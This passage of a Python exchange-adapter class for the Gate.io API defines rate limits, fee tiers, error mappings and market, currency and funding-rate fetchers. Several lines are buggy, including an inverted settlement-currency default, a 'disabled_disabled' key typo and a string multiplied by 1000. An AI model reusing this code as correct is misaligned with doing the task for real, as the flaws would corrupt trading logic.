1.5,\n 'cross/loans': 1.5,\n 'cross/loans/{loan_id}': 1.5,\n 'cross/loans/repayments': 1.5,\n 'cross/transferable': 1.5,\n },\n 'post': {\n 'loans': 1.5,\n 'merged_loans': 1.5,\n 'loans/{loan_id}/repayment': 1.5,\n 'auto_repay': 1.5,\n 'cross/loans': 1.5,\n 'cross/loans/repayments': 1.5,\n },\n 'patch': {\n 'loans/{loan_id}': 1.5,\n 'loan_records/{loan_record_id}': 1.5,\n },\n 'delete': {\n 'loans/{loan_id}': 1.5,\n },\n },\n 'futures': {\n 'get': {\n '{settle}/accounts': 1.5,\n '{settle}/account_book': 1.5,\n '{settle}/positions': 1.5,\n '{settle}/positions/{contract}': 1.5,\n '{settle}/orders': 1.5,\n '{settle}/orders/{order_id}': 1.5,\n '{settle}/my_trades': 1.5,\n '{settle}/position_close': 1.5,\n '{settle}/liquidates': 1.5,\n '{settle}/price_orders': 1.5,\n '{settle}/price_orders/{order_id}': 1.5,\n },\n 'post': {\n '{settle}/positions/{contract}/margin': 1.5,\n '{settle}/positions/{contract}/leverage': 1.5,\n '{settle}/positions/{contract}/risk_limit': 1.5,\n '{settle}/dual_mode': 1.5,\n '{settle}/dual_comp/positions/{contract}': 1.5,\n '{settle}/dual_comp/positions/{contract}/margin': 1.5,\n '{settle}/dual_comp/positions/{contract}/leverage': 1.5,\n '{settle}/dual_comp/positions/{contract}/risk_limit': 1.5,\n '{settle}/orders': 1.5,\n '{settle}/price_orders': 1.5,\n },\n 'delete': {\n '{settle}/orders': 1.5,\n '{settle}/orders/{order_id}': 1.5,\n '{settle}/price_orders': 1.5,\n '{settle}/price_orders/{order_id}': 1.5,\n },\n },\n 'delivery': {\n 'get': {\n '{settle}/accounts': 1.5,\n '{settle}/account_book': 1.5,\n '{settle}/positions': 1.5,\n '{settle}/positions/{contract}': 1.5,\n '{settle}/orders': 1.5,\n '{settle}/orders/{order_id}': 1.5,\n '{settle}/my_trades': 1.5,\n '{settle}/position_close': 1.5,\n '{settle}/liquidates': 1.5,\n '{settle}/price_orders': 1.5,\n '{settle}/price_orders/{order_id}': 1.5,\n },\n 'post': {\n '{settle}/positions/{contract}/margin': 1.5,\n '{settle}/positions/{contract}/leverage': 1.5,\n '{settle}/positions/{contract}/risk_limit': 1.5,\n '{settle}/orders': 1.5,\n '{settle}/price_orders': 1.5,\n },\n 'delete': {\n '{settle}/orders': 1.5,\n '{settle}/orders/{order_id}': 1.5,\n '{settle}/price_orders': 1.5,\n '{settle}/price_orders/{order_id}': 1.5,\n },\n },\n },\n },\n 'timeframes': {\n '10s': '10s',\n '1m': '1m',\n '5m': '5m',\n '15m': '15m',\n '30m': '30m',\n '1h': '1h',\n '4h': '4h',\n '8h': '8h',\n '1d': '1d',\n '7d': '7d',\n },\n # copied from gateiov2\n 'commonCurrencies': {\n '88MPH': 'MPH',\n 'BIFI': 'Bitcoin File',\n 'BOX': 'DefiBox',\n 'BTCBEAR': 'BEAR',\n 'BTCBULL': 'BULL',\n 'BYN': 'Beyond Finance',\n 'EGG': 'Goose Finance',\n 'GTC': 'Game.com', # conflict with Gitcoin and Gastrocoin\n 'GTC_HT': 'Game.com HT',\n 'GTC_BSC': 'Game.com BSC',\n 'HIT': 'HitChain',\n 'MPH': 'Morpher', # conflict with 88MPH\n 'RAI': 'Rai Reflex Index', # conflict with RAI Finance\n 'SBTC': 'Super Bitcoin',\n 'STX': 'Stox',\n 'TNC': 'Trinity Network Credit',\n 'TON': 'TONToken',\n 'VAI': 'VAIOT',\n },\n 'requiredCredentials': {\n 'apiKey': True,\n 'secret': True,\n },\n 'options': {\n 'networks': {\n 'TRC20': 'TRX',\n 'ERC20': 'ETH',\n 'BEP20': 'BSC',\n },\n 'accountsByType': {\n 'spot': 'spot',\n 'margin': 'margin',\n 'futures': 'futures',\n 'delivery': 'delivery',\n },\n 'defaultType': 'spot',\n 'swap': {\n 'fetchMarkets': {\n 'settlementCurrencies': ['usdt', 'btc'],\n },\n },\n 'futures': {\n 'fetchMarkets': {\n 'settlementCurrencies': ['usdt', 'btc'],\n },\n },\n },\n 'precisionMode': TICK_SIZE,\n 'fees': {\n 'trading': {\n 'tierBased': True,\n 'feeSide': 'get',\n 'percentage': True,\n 'maker': self.parse_number('0.002'),\n 'taker': self.parse_number('0.002'),\n 'tiers': {\n # volume is in BTC\n 'maker': [\n [self.parse_number('0'), self.parse_number('0.002')],\n [self.parse_number('1.5'), self.parse_number('0.00185')],\n [self.parse_number('3'), self.parse_number('0.00175')],\n [self.parse_number('6'), self.parse_number('0.00165')],\n [self.parse_number('12.5'), self.parse_number('0.00155')],\n [self.parse_number('25'), self.parse_number('0.00145')],\n [self.parse_number('75'), self.parse_number('0.00135')],\n [self.parse_number('200'), self.parse_number('0.00125')],\n [self.parse_number('500'), self.parse_number('0.00115')],\n [self.parse_number('1250'), self.parse_number('0.00105')],\n [self.parse_number('2500'), self.parse_number('0.00095')],\n [self.parse_number('3000'), self.parse_number('0.00085')],\n [self.parse_number('6000'), self.parse_number('0.00075')],\n [self.parse_number('11000'), self.parse_number('0.00065')],\n [self.parse_number('20000'), self.parse_number('0.00055')],\n [self.parse_number('40000'), self.parse_number('0.00055')],\n [self.parse_number('75000'), self.parse_number('0.00055')],\n ],\n 'taker': [\n [self.parse_number('0'), self.parse_number('0.002')],\n [self.parse_number('1.5'), self.parse_number('0.00195')],\n [self.parse_number('3'), self.parse_number('0.00185')],\n [self.parse_number('6'), self.parse_number('0.00175')],\n [self.parse_number('12.5'), self.parse_number('0.00165')],\n [self.parse_number('25'), self.parse_number('0.00155')],\n [self.parse_number('75'), self.parse_number('0.00145')],\n [self.parse_number('200'), self.parse_number('0.00135')],\n [self.parse_number('500'), self.parse_number('0.00125')],\n [self.parse_number('1250'), self.parse_number('0.00115')],\n [self.parse_number('2500'), self.parse_number('0.00105')],\n [self.parse_number('3000'), self.parse_number('0.00095')],\n [self.parse_number('6000'), self.parse_number('0.00085')],\n [self.parse_number('11000'), self.parse_number('0.00075')],\n [self.parse_number('20000'), self.parse_number('0.00065')],\n [self.parse_number('40000'), self.parse_number('0.00065')],\n [self.parse_number('75000'), self.parse_number('0.00065')],\n ],\n },\n },\n 'swap': {\n 'tierBased': True,\n 'feeSide': 'base',\n 'percentage': True,\n 'maker': self.parse_number('0.0'),\n 'taker': self.parse_number('0.0005'),\n 'tiers': {\n 'maker': [\n [self.parse_number('0'), self.parse_number('0.0000')],\n [self.parse_number('1.5'), self.parse_number('-0.00005')],\n [self.parse_number('3'), self.parse_number('-0.00005')],\n [self.parse_number('6'), self.parse_number('-0.00005')],\n [self.parse_number('12.5'), self.parse_number('-0.00005')],\n [self.parse_number('25'), self.parse_number('-0.00005')],\n [self.parse_number('75'), self.parse_number('-0.00005')],\n [self.parse_number('200'), self.parse_number('-0.00005')],\n [self.parse_number('500'), self.parse_number('-0.00005')],\n [self.parse_number('1250'), self.parse_number('-0.00005')],\n [self.parse_number('2500'), self.parse_number('-0.00005')],\n [self.parse_number('3000'), self.parse_number('-0.00008')],\n [self.parse_number('6000'), self.parse_number('-0.01000')],\n [self.parse_number('11000'), self.parse_number('-0.01002')],\n [self.parse_number('20000'), self.parse_number('-0.01005')],\n [self.parse_number('40000'), self.parse_number('-0.02000')],\n [self.parse_number('75000'), self.parse_number('-0.02005')],\n ],\n 'taker': [\n [self.parse_number('0'), self.parse_number('0.00050')],\n [self.parse_number('1.5'), self.parse_number('0.00048')],\n [self.parse_number('3'), self.parse_number('0.00046')],\n [self.parse_number('6'), self.parse_number('0.00044')],\n [self.parse_number('12.5'), self.parse_number('0.00042')],\n [self.parse_number('25'), self.parse_number('0.00040')],\n [self.parse_number('75'), self.parse_number('0.00038')],\n [self.parse_number('200'), self.parse_number('0.00036')],\n [self.parse_number('500'), self.parse_number('0.00034')],\n [self.parse_number('1250'), self.parse_number('0.00032')],\n [self.parse_number('2500'), self.parse_number('0.00030')],\n [self.parse_number('3000'), self.parse_number('0.00030')],\n [self.parse_number('6000'), self.parse_number('0.00030')],\n [self.parse_number('11000'), self.parse_number('0.00030')],\n [self.parse_number('20000'), self.parse_number('0.00030')],\n [self.parse_number('40000'), self.parse_number('0.00030')],\n [self.parse_number('75000'), self.parse_number('0.00030')],\n ],\n },\n },\n },\n # https://www.gate.io/docs/apiv4/en/index.html#label-list\n 'exceptions': {\n 'INVALID_PARAM_VALUE': BadRequest,\n 'INVALID_PROTOCOL': BadRequest,\n 'INVALID_ARGUMENT': BadRequest,\n 'INVALID_REQUEST_BODY': BadRequest,\n 'MISSING_REQUIRED_PARAM': ArgumentsRequired,\n 'BAD_REQUEST': BadRequest,\n 'INVALID_CONTENT_TYPE': BadRequest,\n 'NOT_ACCEPTABLE': BadRequest,\n 'METHOD_NOT_ALLOWED': BadRequest,\n 'NOT_FOUND': ExchangeError,\n 'INVALID_CREDENTIALS': AuthenticationError,\n 'INVALID_KEY': AuthenticationError,\n 'IP_FORBIDDEN': AuthenticationError,\n 'READ_ONLY': PermissionDenied,\n 'INVALID_SIGNATURE': AuthenticationError,\n 'MISSING_REQUIRED_HEADER': AuthenticationError,\n 'REQUEST_EXPIRED': AuthenticationError,\n 'ACCOUNT_LOCKED': AccountSuspended,\n 'FORBIDDEN': PermissionDenied,\n 'SUB_ACCOUNT_NOT_FOUND': ExchangeError,\n 'SUB_ACCOUNT_LOCKED': AccountSuspended,\n 'MARGIN_BALANCE_EXCEPTION': ExchangeError,\n 'MARGIN_TRANSFER_FAILED': ExchangeError,\n 'TOO_MUCH_FUTURES_AVAILABLE': ExchangeError,\n 'FUTURES_BALANCE_NOT_ENOUGH': InsufficientFunds,\n 'ACCOUNT_EXCEPTION': ExchangeError,\n 'SUB_ACCOUNT_TRANSFER_FAILED': ExchangeError,\n 'ADDRESS_NOT_USED': ExchangeError,\n 'TOO_FAST': RateLimitExceeded,\n 'WITHDRAWAL_OVER_LIMIT': ExchangeError,\n 'API_WITHDRAW_DISABLED': ExchangeNotAvailable,\n 'INVALID_WITHDRAW_ID': ExchangeError,\n 'INVALID_WITHDRAW_CANCEL_STATUS': ExchangeError,\n 'INVALID_PRECISION': InvalidOrder,\n 'INVALID_CURRENCY': BadSymbol,\n 'INVALID_CURRENCY_PAIR': BadSymbol,\n 'POC_FILL_IMMEDIATELY': ExchangeError,\n 'ORDER_NOT_FOUND': OrderNotFound,\n 'ORDER_CLOSED': InvalidOrder,\n 'ORDER_CANCELLED': InvalidOrder,\n 'QUANTITY_NOT_ENOUGH': InvalidOrder,\n 'BALANCE_NOT_ENOUGH': InsufficientFunds,\n 'MARGIN_NOT_SUPPORTED': InvalidOrder,\n 'MARGIN_BALANCE_NOT_ENOUGH': InsufficientFunds,\n 'AMOUNT_TOO_LITTLE': InvalidOrder,\n 'AMOUNT_TOO_MUCH': InvalidOrder,\n 'REPEATED_CREATION': InvalidOrder,\n 'LOAN_NOT_FOUND': OrderNotFound,\n 'LOAN_RECORD_NOT_FOUND': OrderNotFound,\n 'NO_MATCHED_LOAN': ExchangeError,\n 'NOT_MERGEABLE': ExchangeError,\n 'NO_CHANGE': ExchangeError,\n 'REPAY_TOO_MUCH': ExchangeError,\n 'TOO_MANY_CURRENCY_PAIRS': InvalidOrder,\n 'TOO_MANY_ORDERS': InvalidOrder,\n 'MIXED_ACCOUNT_TYPE': InvalidOrder,\n 'AUTO_BORROW_TOO_MUCH': ExchangeError,\n 'TRADE_RESTRICTED': InsufficientFunds,\n 'USER_NOT_FOUND': ExchangeError,\n 'CONTRACT_NO_COUNTER': ExchangeError,\n 'CONTRACT_NOT_FOUND': BadSymbol,\n 'RISK_LIMIT_EXCEEDED': ExchangeError,\n 'INSUFFICIENT_AVAILABLE': InsufficientFunds,\n 'LIQUIDATE_IMMEDIATELY': InvalidOrder,\n 'LEVERAGE_TOO_HIGH': InvalidOrder,\n 'LEVERAGE_TOO_LOW': InvalidOrder,\n 'ORDER_NOT_OWNED': ExchangeError,\n 'ORDER_FINISHED': ExchangeError,\n 'POSITION_CROSS_MARGIN': ExchangeError,\n 'POSITION_IN_LIQUIDATION': ExchangeError,\n 'POSITION_IN_CLOSE': ExchangeError,\n 'POSITION_EMPTY': InvalidOrder,\n 'REMOVE_TOO_MUCH': ExchangeError,\n 'RISK_LIMIT_NOT_MULTIPLE': ExchangeError,\n 'RISK_LIMIT_TOO_HIGH': ExchangeError,\n 'RISK_LIMIT_TOO_lOW': ExchangeError,\n 'PRICE_TOO_DEVIATED': InvalidOrder,\n 'SIZE_TOO_LARGE': InvalidOrder,\n 'SIZE_TOO_SMALL': InvalidOrder,\n 'PRICE_OVER_LIQUIDATION': InvalidOrder,\n 'PRICE_OVER_BANKRUPT': InvalidOrder,\n 'ORDER_POC_IMMEDIATE': InvalidOrder,\n 'INCREASE_POSITION': InvalidOrder,\n 'CONTRACT_IN_DELISTING': ExchangeError,\n 'INTERNAL': ExchangeError,\n 'SERVER_ERROR': ExchangeError,\n 'TOO_BUSY': ExchangeNotAvailable,\n },\n })\n\n def fetch_markets(self, params={}):\n # :param params['type']: 'spot', 'margin', 'futures' or 'delivery'\n # :param params['settle']: The quote currency\n defaultType = self.safe_string_2(self.options, 'fetchMarkets', 'defaultType', 'spot')\n type = self.safe_string(params, 'type', defaultType)\n query = self.omit(params, 'type')\n spot = (type == 'spot')\n margin = (type == 'margin')\n futures = (type == 'futures')\n swap = (type == 'swap')\n option = (type == 'option')\n if not spot and not margin and not futures and not swap:\n raise ExchangeError(self.id + \" does not support '\" + type + \"' type, set exchange.options['defaultType'] to \" + \"'spot', 'margin', 'swap' or 'futures'\") # eslint-disable-line quotes\n response = None\n result = []\n method = self.get_supported_mapping(type, {\n 'spot': 'publicSpotGetCurrencyPairs',\n 'margin': 'publicMarginGetCurrencyPairs',\n 'swap': 'publicFuturesGetSettleContracts',\n 'futures': 'publicDeliveryGetSettleContracts',\n })\n if swap or futures or option:\n settlementCurrencies = self.get_settlement_currencies(type, 'fetchMarkets')\n for c in range(0, len(settlementCurrencies)):\n settle = settlementCurrencies[c]\n query['settle'] = settle\n response = getattr(self, method)(query)\n # Perpetual swap\n # [\n # {\n # \"name\": \"BTC_USDT\",\n # \"type\": \"direct\",\n # \"quanto_multiplier\": \"0.0001\",\n # \"ref_discount_rate\": \"0\",\n # \"order_price_deviate\": \"0.5\",\n # \"maintenance_rate\": \"0.005\",\n # \"mark_type\": \"index\",\n # \"last_price\": \"38026\",\n # \"mark_price\": \"37985.6\",\n # \"index_price\": \"37954.92\",\n # \"funding_rate_indicative\": \"0.000219\",\n # \"mark_price_round\": \"0.01\",\n # \"funding_offset\": 0,\n # \"in_delisting\": False,\n # \"risk_limit_base\": \"1000000\",\n # \"interest_rate\": \"0.0003\",\n # \"order_price_round\": \"0.1\",\n # \"order_size_min\": 1,\n # \"ref_rebate_rate\": \"0.2\",\n # \"funding_interval\": 28800,\n # \"risk_limit_step\": \"1000000\",\n # \"leverage_min\": \"1\",\n # \"leverage_max\": \"100\",\n # \"risk_limit_max\": \"8000000\",\n # \"maker_fee_rate\": \"-0.00025\",\n # \"taker_fee_rate\": \"0.00075\",\n # \"funding_rate\": \"0.002053\",\n # \"order_size_max\": 1000000,\n # \"funding_next_apply\": 1610035200,\n # \"short_users\": 977,\n # \"config_change_time\": 1609899548,\n # \"trade_size\": 28530850594,\n # \"position_size\": 5223816,\n # \"long_users\": 455,\n # \"funding_impact_value\": \"60000\",\n # \"orders_limit\": 50,\n # \"trade_id\": 10851092,\n # \"orderbook_id\": 2129638396\n # }\n # ]\n #\n # Delivery Futures\n # [\n # {\n # \"name\": \"BTC_USDT_20200814\",\n # \"underlying\": \"BTC_USDT\",\n # \"cycle\": \"WEEKLY\",\n # \"type\": \"direct\",\n # \"quanto_multiplier\": \"0.0001\",\n # \"mark_type\": \"index\",\n # \"last_price\": \"9017\",\n # \"mark_price\": \"9019\",\n # \"index_price\": \"9005.3\",\n # \"basis_rate\": \"0.185095\",\n # \"basis_value\": \"13.7\",\n # \"basis_impact_value\": \"100000\",\n # \"settle_price\": \"0\",\n # \"settle_price_interval\": 60,\n # \"settle_price_duration\": 1800,\n # \"settle_fee_rate\": \"0.0015\",\n # \"expire_time\": 1593763200,\n # \"order_price_round\": \"0.1\",\n # \"mark_price_round\": \"0.1\",\n # \"leverage_min\": \"1\",\n # \"leverage_max\": \"100\",\n # \"maintenance_rate\": \"1000000\",\n # \"risk_limit_base\": \"140.726652109199\",\n # \"risk_limit_step\": \"1000000\",\n # \"risk_limit_max\": \"8000000\",\n # \"maker_fee_rate\": \"-0.00025\",\n # \"taker_fee_rate\": \"0.00075\",\n # \"ref_discount_rate\": \"0\",\n # \"ref_rebate_rate\": \"0.2\",\n # \"order_price_deviate\": \"0.5\",\n # \"order_size_min\": 1,\n # \"order_size_max\": 1000000,\n # \"orders_limit\": 50,\n # \"orderbook_id\": 63,\n # \"trade_id\": 26,\n # \"trade_size\": 435,\n # \"position_size\": 130,\n # \"config_change_time\": 1593158867,\n # \"in_delisting\": False\n # }\n # ]\n #\n for i in range(0, len(response)):\n market = response[i]\n id = self.safe_string(market, 'name')\n baseId, quoteId, date = id.split('_')\n linear = quoteId.lower() == settle\n inverse = baseId.lower() == settle\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n symbol = ''\n if date:\n symbol = base + '/' + quote + '-' + date + ':' + self.safe_currency_code(settle)\n else:\n symbol = base + '/' + quote + ':' + self.safe_currency_code(settle)\n priceDeviate = self.safe_string(market, 'order_price_deviate')\n markPrice = self.safe_string(market, 'mark_price')\n minMultiplier = Precise.string_sub('1', priceDeviate)\n maxMultiplier = Precise.string_add('1', priceDeviate)\n minPrice = Precise.string_mul(minMultiplier, markPrice)\n maxPrice = Precise.string_mul(maxMultiplier, markPrice)\n takerPercent = self.safe_string(market, 'taker_fee_rate')\n makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)\n feeIndex = 'swap' if (type == 'futures') else type\n pricePrecision = self.safe_number(market, 'order_price_round')\n result.append({\n 'info': market,\n 'id': id,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'settleId': self.safe_symbol(settle),\n 'base': base,\n 'quote': quote,\n 'symbol': symbol,\n 'type': type,\n 'spot': spot,\n 'margin': margin,\n 'futures': futures,\n 'swap': swap,\n 'option': option,\n 'derivative': True,\n 'contract': True,\n 'linear': linear,\n 'inverse': inverse,\n # Fee is in %, so divide by 100\n 'taker': self.parse_number(Precise.string_div(takerPercent, '100')),\n 'maker': self.parse_number(Precise.string_div(makerPercent, '100')),\n 'contractSize': self.safe_string(market, 'quanto_multiplier'),\n 'precision': {\n 'amount': self.parse_number('1'),\n 'price': pricePrecision,\n },\n 'limits': {\n 'leverage': {\n 'min': self.safe_number(market, 'leverage_min'),\n 'max': self.safe_number(market, 'leverage_max'),\n },\n 'amount': {\n 'min': self.safe_number(market, 'order_size_min'),\n 'max': self.safe_number(market, 'order_size_max'),\n },\n 'price': {\n 'min': minPrice,\n 'max': maxPrice,\n },\n },\n 'expiry': self.safe_integer(market, 'expire_time'),\n 'fees': self.safe_value(self.fees, feeIndex, {}),\n })\n else:\n response = getattr(self, method)(query)\n #\n # Spot\n # [\n # {\n # \"id\": \"DEGO_USDT\",\n # \"base\": \"DEGO\",\n # \"quote\": \"USDT\",\n # \"fee\": \"0.2\",\n # \"min_quote_amount\": \"1\",\n # \"amount_precision\": \"4\",\n # \"precision\": \"4\",\n # \"trade_status\": \"tradable\",\n # \"sell_start\": \"0\",\n # \"buy_start\": \"0\"\n # }\n # ]\n #\n # Margin\n # [\n # {\n # \"id\": \"ETH_USDT\",\n # \"base\": \"ETH\",\n # \"quote\": \"USDT\",\n # \"leverage\": 3,\n # \"min_base_amount\": \"0.01\",\n # \"min_quote_amount\": \"100\",\n # \"max_quote_amount\": \"1000000\"\n # }\n # ]\n #\n for i in range(0, len(response)):\n market = response[i]\n id = self.safe_string(market, 'id')\n spot = (type == 'spot')\n futures = (type == 'futures')\n swap = (type == 'swap')\n option = (type == 'option')\n baseId, quoteId = id.split('_')\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n symbol = base + '/' + quote\n takerPercent = self.safe_string(market, 'fee')\n makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)\n amountPrecisionString = self.safe_string(market, 'amount_precision')\n pricePrecisionString = self.safe_string(market, 'precision')\n amountPrecision = self.parse_number(self.parse_precision(amountPrecisionString))\n pricePrecision = self.parse_number(self.parse_precision(pricePrecisionString))\n tradeStatus = self.safe_string(market, 'trade_status')\n result.append({\n 'info': market,\n 'id': id,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'base': base,\n 'quote': quote,\n 'symbol': symbol,\n 'type': type,\n 'spot': spot,\n 'margin': margin,\n 'futures': futures,\n 'swap': swap,\n 'option': option,\n 'contract': False,\n 'derivative': False,\n 'linear': False,\n 'inverse': False,\n # Fee is in %, so divide by 100\n 'taker': self.parse_number(Precise.string_div(takerPercent, '100')),\n 'maker': self.parse_number(Precise.string_div(makerPercent, '100')),\n 'precision': {\n 'amount': amountPrecision,\n 'price': pricePrecision,\n },\n 'active': tradeStatus == 'tradable',\n 'limits': {\n 'amount': {\n 'min': amountPrecision,\n 'max': None,\n },\n 'price': {\n 'min': pricePrecision,\n 'max': None,\n },\n 'cost': {\n 'min': self.safe_number(market, 'min_quote_amount'),\n 'max': None,\n },\n 'leverage': {\n 'max': self.safe_number(market, 'lever', 1),\n },\n },\n })\n return result\n\n def prepare_request(self, market):\n if market['contract']:\n return {\n 'contract': market['id'],\n 'settle': market['settleId'],\n }\n else:\n return {\n 'currency_pair': market['id'],\n }\n\n def get_settlement_currencies(self, type, method):\n options = self.safe_value(self.options, type, {}) # ['BTC', 'USDT'] unified codes\n fetchMarketsContractOptions = self.safe_value(options, method, {})\n defaultSettle = type == ['usdt'] if 'swap' else ['btc']\n return self.safe_value(fetchMarketsContractOptions, 'settlementCurrencies', defaultSettle)\n\n def fetch_currencies(self, params={}):\n response = self.publicSpotGetCurrencies(params)\n #\n # {\n # \"currency\": \"BCN\",\n # \"delisted\": False,\n # \"withdraw_disabled\": True,\n # \"withdraw_delayed\": False,\n # \"deposit_disabled\": True,\n # \"trade_disabled\": False\n # }\n #\n result = {}\n # TODO: remove magic constants\n amountPrecision = self.parse_number('1e-6')\n for i in range(0, len(response)):\n entry = response[i]\n currencyId = self.safe_string(entry, 'currency')\n code = self.safe_currency_code(currencyId)\n delisted = self.safe_value(entry, 'delisted')\n withdraw_disabled = self.safe_value(entry, 'withdraw_disabled')\n deposit_disabled = self.safe_value(entry, 'disabled_disabled')\n trade_disabled = self.safe_value(entry, 'trade_disabled')\n active = not (delisted and withdraw_disabled and deposit_disabled and trade_disabled)\n result[code] = {\n 'id': currencyId,\n 'name': None,\n 'code': code,\n 'precision': amountPrecision,\n 'info': entry,\n 'active': active,\n 'fee': None,\n 'fees': [],\n 'limits': self.limits,\n }\n return result\n\n def fetch_funding_rate(self, symbol, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'contract': market['id'],\n 'settle': market['quote'].lower(),\n }\n response = self.publicFuturesGetSettleContractsContract(self.extend(request, params))\n #\n # [\n # {\n # \"name\": \"BTC_USDT\",\n # \"type\": \"direct\",\n # \"quanto_multiplier\": \"0.0001\",\n # \"ref_discount_rate\": \"0\",\n # \"order_price_deviate\": \"0.5\",\n # \"maintenance_rate\": \"0.005\",\n # \"mark_type\": \"index\",\n # \"last_price\": \"38026\",\n # \"mark_price\": \"37985.6\",\n # \"index_price\": \"37954.92\",\n # \"funding_rate_indicative\": \"0.000219\",\n # \"mark_price_round\": \"0.01\",\n # \"funding_offset\": 0,\n # \"in_delisting\": False,\n # \"risk_limit_base\": \"1000000\",\n # \"interest_rate\": \"0.0003\",\n # \"order_price_round\": \"0.1\",\n # \"order_size_min\": 1,\n # \"ref_rebate_rate\": \"0.2\",\n # \"funding_interval\": 28800,\n # \"risk_limit_step\": \"1000000\",\n # \"leverage_min\": \"1\",\n # \"leverage_max\": \"100\",\n # \"risk_limit_max\": \"8000000\",\n # \"maker_fee_rate\": \"-0.00025\",\n # \"taker_fee_rate\": \"0.00075\",\n # \"funding_rate\": \"0.002053\",\n # \"order_size_max\": 1000000,\n # \"funding_next_apply\": 1610035200,\n # \"short_users\": 977,\n # \"config_change_time\": 1609899548,\n # \"trade_size\": 28530850594,\n # \"position_size\": 5223816,\n # \"long_users\": 455,\n # \"funding_impact_value\": \"60000\",\n # \"orders_limit\": 50,\n # \"trade_id\": 10851092,\n # \"orderbook_id\": 2129638396\n # }\n # ]\n #\n return self.parse_funding_rate(response)\n\n def fetch_funding_rates(self, symbols=None, params={}):\n self.load_markets()\n settle = self.safe_string(params, 'settle') # TODO: Save settle in markets?\n request = {\n 'settle': settle.lower(),\n }\n response = self.publicFuturesGetSettleContracts(self.extend(request, params))\n #\n # [\n # {\n # \"name\": \"BTC_USDT\",\n # \"type\": \"direct\",\n # \"quanto_multiplier\": \"0.0001\",\n # \"ref_discount_rate\": \"0\",\n # \"order_price_deviate\": \"0.5\",\n # \"maintenance_rate\": \"0.005\",\n # \"mark_type\": \"index\",\n # \"last_price\": \"38026\",\n # \"mark_price\": \"37985.6\",\n # \"index_price\": \"37954.92\",\n # \"funding_rate_indicative\": \"0.000219\",\n # \"mark_price_round\": \"0.01\",\n # \"funding_offset\": 0,\n # \"in_delisting\": False,\n # \"risk_limit_base\": \"1000000\",\n # \"interest_rate\": \"0.0003\",\n # \"order_price_round\": \"0.1\",\n # \"order_size_min\": 1,\n # \"ref_rebate_rate\": \"0.2\",\n # \"funding_interval\": 28800,\n # \"risk_limit_step\": \"1000000\",\n # \"leverage_min\": \"1\",\n # \"leverage_max\": \"100\",\n # \"risk_limit_max\": \"8000000\",\n # \"maker_fee_rate\": \"-0.00025\",\n # \"taker_fee_rate\": \"0.00075\",\n # \"funding_rate\": \"0.002053\",\n # \"order_size_max\": 1000000,\n # \"funding_next_apply\": 1610035200,\n # \"short_users\": 977,\n # \"config_change_time\": 1609899548,\n # \"trade_size\": 28530850594,\n # \"position_size\": 5223816,\n # \"long_users\": 455,\n # \"funding_impact_value\": \"60000\",\n # \"orders_limit\": 50,\n # \"trade_id\": 10851092,\n # \"orderbook_id\": 2129638396\n # }\n # ]\n #\n result = self.parse_funding_rates(response)\n return self.filter_by_array(result, 'symbol', symbols)\n\n def parse_funding_rate(self, contract, market=None):\n #\n # {\n # \"name\": \"BTC_USDT\",\n # \"type\": \"direct\",\n # \"quanto_multiplier\": \"0.0001\",\n # \"ref_discount_rate\": \"0\",\n # \"order_price_deviate\": \"0.5\",\n # \"maintenance_rate\": \"0.005\",\n # \"mark_type\": \"index\",\n # \"last_price\": \"38026\",\n # \"mark_price\": \"37985.6\",\n # \"index_price\": \"37954.92\",\n # \"funding_rate_indicative\": \"0.000219\",\n # \"mark_price_round\": \"0.01\",\n # \"funding_offset\": 0,\n # \"in_delisting\": False,\n # \"risk_limit_base\": \"1000000\",\n # \"interest_rate\": \"0.0003\",\n # \"order_price_round\": \"0.1\",\n # \"order_size_min\": 1,\n # \"ref_rebate_rate\": \"0.2\",\n # \"funding_interval\": 28800,\n # \"risk_limit_step\": \"1000000\",\n # \"leverage_min\": \"1\",\n # \"leverage_max\": \"100\",\n # \"risk_limit_max\": \"8000000\",\n # \"maker_fee_rate\": \"-0.00025\",\n # \"taker_fee_rate\": \"0.00075\",\n # \"funding_rate\": \"0.002053\",\n # \"order_size_max\": 1000000,\n # \"funding_next_apply\": 1610035200,\n # \"short_users\": 977,\n # \"config_change_time\": 1609899548,\n # \"trade_size\": 28530850594,\n # \"position_size\": 5223816,\n # \"long_users\": 455,\n # \"funding_impact_value\": \"60000\",\n # \"orders_limit\": 50,\n # \"trade_id\": 10851092,\n # \"orderbook_id\": 2129638396\n # }\n #\n marketId = self.safe_string(contract, 'name')\n symbol = self.safe_symbol(marketId, market)\n markPrice = self.safe_number(contract, 'mark_price')\n indexPrice = self.safe_number(contract, 'index_price')\n interestRate = self.safe_number(contract, 'interest_rate')\n fundingRate = self.safe_string(contract, 'funding_rate')\n fundingInterval = self.safe_string(contract, 'funding_interval') * 1000\n nextFundingTime = self.safe_integer(contract, 'funding_next_apply') * 1000\n previousFundingTime = (self.safe_number(contract, 'funding_next_apply') * 1000) - fundingInterval\n fundingRateIndicative = self.safe_number(contract, 'funding_rate_indicative')\n timestamp = self.milliseconds()\n return {\n 'info': contract,\n 'symbol': symbol,\n 'markPrice': markPrice,\n 'indexPrice': indexPrice,\n 'interestRate': interestRate,\n 'estimatedSettlePrice': None,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'previousFundingRate': fundingRate,\n 'nextFundingRate': fundingRateIndicative,\n 'previousFundingTimestamp': previousFundingTime,\n 'nextFundingTimestamp': nextFundingTime,\n 'previousFundingDatetime': self.iso8601(previousFundingTime),\n 'nextFundingDatetime': self.iso8601(nextFundingTime),\n }\n\n def fetch_network_deposit_address(self, code, params={}):\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n }\n response = self.privateWalletGetDepositAddress(self.extend(request, params))\n addresses = self.safe_value(response, 'multichain_addresses')\n currencyId = self.safe_string(response, 'currency')\n code = self.safe_currency_code(currencyId)\n result = {}\n for i in range(0, len(addresses)):\n entry = addresses[i]\n #\n # {\n # \"chain\": \"ETH\",\n # \"address\": \"0x359a697945E79C7e17b634675BD73B33324E9408\",\n # \"payment_id\": \"\",\n # \"payment_name\": \"\",\n # \"obtain_failed\": \"0\"\n # }\n #\n obtainFailed = self.safe_integer(entry, 'obtain_failed')\n if obtainFailed:\n continue\n network = self.safe_string(entry, 'chain')\n address = 